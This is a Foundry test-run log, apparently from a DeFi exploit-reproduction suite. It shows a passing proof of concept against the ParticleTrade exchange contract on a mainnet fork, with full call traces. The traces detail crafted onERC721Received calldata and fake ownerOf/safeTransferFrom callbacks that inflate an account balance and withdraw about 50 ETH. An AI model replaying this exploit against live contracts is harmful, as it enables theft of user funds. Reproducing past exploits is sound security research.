Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-02/ParticleTrade_exp.sol:103:9:
    |
103 |         uint256 tokenId
    |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-02/ParticleTrade_exp.sol:108:31:
    |
108 |     function safeTransferFrom(address from, address to, uint256 tokenId, bytes calldata _data) external {
    |                               ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-02/ParticleTrade_exp.sol:108:45:
    |
108 |     function safeTransferFrom(address from, address to, uint256 tokenId, bytes calldata _data) external {
    |                                             ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-02/ParticleTrade_exp.sol:108:57:
    |
108 |     function safeTransferFrom(address from, address to, uint256 tokenId, bytes calldata _data) external {
    |                                                         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-02/ParticleTrade_exp.sol:108:74:
    |
108 |     function safeTransferFrom(address from, address to, uint256 tokenId, bytes calldata _data) external {
    |                                                                          ^^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
   --> src/test/2024-02/ParticleTrade_exp.sol:102:5:
    |
102 |     function ownerOf(
    |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 484.75ms (1.73ms CPU time)

Ran 1 test for src/test/2024-02/ParticleTrade_exp.sol:ContractTest
[PASS] testExploit() (gas: 127195)
Logs:
  Attacker Eth balance before attack:: 0.000000000000000000
  Attacker Eth balance after attack:: 50.126827091960426151

Traces:
  [17734] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19231445 [1.923e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D], "proxy")
    │   └─ ← [Return]
    ├─ [0] VM::label(Azuki: [0xB6a37b5d14D502c3Ab0Ae6f3a0E058BC9517786e], "Azuki")
    │   └─ ← [Return]
    ├─ [0] VM::label(ParticleExchange: [0xE4764f9cd8ECc9659d3abf35259638B20ac536E4], "ParticleExchange")
    │   └─ ← [Return]
    ├─ [0] VM::label(Reservoir: [0xC2c862322E9c97D6244a3506655DA95F05246Fd8], "Reservoir")
    │   └─ ← [Return]
    └─ ← [Stop]

  [164259] ContractTest::testExploit()
    ├─ [0] 0x0000000000000000000000000000000000000000::fallback{value: 79228162514264337593543950335}()
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "Attacker Eth balance before attack:", val: 0, decimals: 18)
    ├─ [41031] proxy::offerBid(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0, 0)
    │   ├─ [36118] ParticleExchange::offerBid(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0, 0) [delegatecall]
    │   │   ├─ emit OfferBid(: 76, : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 0, : 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x91affc688a015cd7c1a0e3be24a0cccc5190cb81a14f8d03a50b3c996889a111: 0 → 0xa695e9f9acb3440969bb7c5ecbb69a75cbebaf710cc449b2352ec6a3db9847eb
    │   │   │   @ 252: 76 → 77
    │   │   └─ ← [Return] 76
    │   └─ ← [Return] 76
    ├─ [31145] proxy::onERC721Received(0x0000000000000000000000000000000000000000, 0x0000000000000000000000000000000000000000, 50126827091960426151 [5.012e19], 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c2c862322e9c97d6244a3506655da95f05246fd8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000000023078000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [30636] ParticleExchange::onERC721Received(0x0000000000000000000000000000000000000000, 0x0000000000000000000000000000000000000000, 50126827091960426151 [5.012e19], 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c2c862322e9c97d6244a3506655da95f05246fd8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000000023078000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   ├─ [2821] ContractTest::ownerOf(50126827091960426151 [5.012e19]) [staticcall]
    │   │   │   └─ ← [Return] proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D]
    │   │   ├─ emit AcceptBid(: 76, : 0x0000000000000000000000000000000000000000, : 50126827091960426151 [5.012e19], : 0, : 1707977315 [1.707e9])
    │   │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [4228] ContractTest::safeTransferFrom(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D], Reservoir: [0xC2c862322E9c97D6244a3506655DA95F05246Fd8], 50126827091960426151 [5.012e19], 0x3078)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 37: 0x0000000000000000000000007c5c9afecf4013c43217fb6a626a4687381f080d → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [821] ContractTest::ownerOf(50126827091960426151 [5.012e19]) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   ├─  storage changes:
    │   │   │   @ 0x91affc688a015cd7c1a0e3be24a0cccc5190cb81a14f8d03a50b3c996889a111: 0xa695e9f9acb3440969bb7c5ecbb69a75cbebaf710cc449b2352ec6a3db9847eb → 0x3599cb7020ed9f0d8e855e54066668831b54464e1e2313ee3b1cf4c61670d541
    │   │   └─ ← [Return] 0x150b7a02
    │   └─ ← [Return] 0x150b7a02
    ├─ [40545] proxy::onERC721Received(0x0000000000000000000000000000000000000000, 0x0000000000000000000000000000000000000000, 19231446 [1.923e7], 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000002b7a643a825ba6ea7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065cdaa630000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c2c862322e9c97d6244a3506655da95f05246fd8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000000023078000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [40036] ParticleExchange::onERC721Received(0x0000000000000000000000000000000000000000, 0x0000000000000000000000000000000000000000, 19231446 [1.923e7], 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000002b7a643a825ba6ea7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065cdaa630000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c2c862322e9c97d6244a3506655da95f05246fd8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000000023078000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   ├─ [821] ContractTest::ownerOf(19231446 [1.923e7]) [staticcall]
    │   │   │   └─ ← [Return] proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D]
    │   │   ├─ emit AcceptBid(: 76, : 0x0000000000000000000000000000000000000000, : 19231446 [1.923e7], : 0, : 1707977315 [1.707e9])
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [4228] ContractTest::safeTransferFrom(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D], Reservoir: [0xC2c862322E9c97D6244a3506655DA95F05246Fd8], 19231446 [1.923e7], 0x3078)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 37: 0x0000000000000000000000007c5c9afecf4013c43217fb6a626a4687381f080d → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(proxy: [0x7c5C9AfEcf4013c43217Fb6A626A4687381f080D]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [821] ContractTest::ownerOf(19231446 [1.923e7]) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   ├─  storage changes:
    │   │   │   @ 0x575f78df93eb84e00764fcde5a40c5b2b6dd9839d61c9debadc662a736c271b3: 0 → 0x000000000000000000000000000000000000000000000002b7a643a825ba6ea7
    │   │   │   @ 0x91affc688a015cd7c1a0e3be24a0cccc5190cb81a14f8d03a50b3c996889a111: 0x3599cb7020ed9f0d8e855e54066668831b54464e1e2313ee3b1cf4c61670d541 → 0xe70a9bb5571d03a4450b51ef3ea5da4e93a4baaae41b25605be2f5e555b4df4d
    │   │   └─ ← [Return] 0x150b7a02
    │   └─ ← [Return] 0x150b7a02
    ├─ [1022] proxy::accountBalance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [624] ParticleExchange::accountBalance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 50126827091960426151 [5.012e19]
    │   └─ ← [Return] 50126827091960426151 [5.012e19]
    ├─ [12508] proxy::withdrawAccountBalance()
    │   ├─ [12116] ParticleExchange::withdrawAccountBalance() [delegatecall]
    │   │   ├─ [55] ContractTest::receive{value: 50126827091960426151}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit WithdrawAccountBalance(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 50126827091960426151 [5.012e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x575f78df93eb84e00764fcde5a40c5b2b6dd9839d61c9debadc662a736c271b3: 0x000000000000000000000000000000000000000000000002b7a643a825ba6ea7 → 0
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker Eth balance after attack:", val: 50126827091960426151 [5.012e19], decimals: 18)
    ├─  storage changes:
    │   @ 251: 2 → 1
    │   @ 37: 0 → 0x0000000000000000000000007c5c9afecf4013c43217fb6a626a4687381f080d
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.74s (2.53s CPU time)

Ran 2 test suites in 4.63s (4.23s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
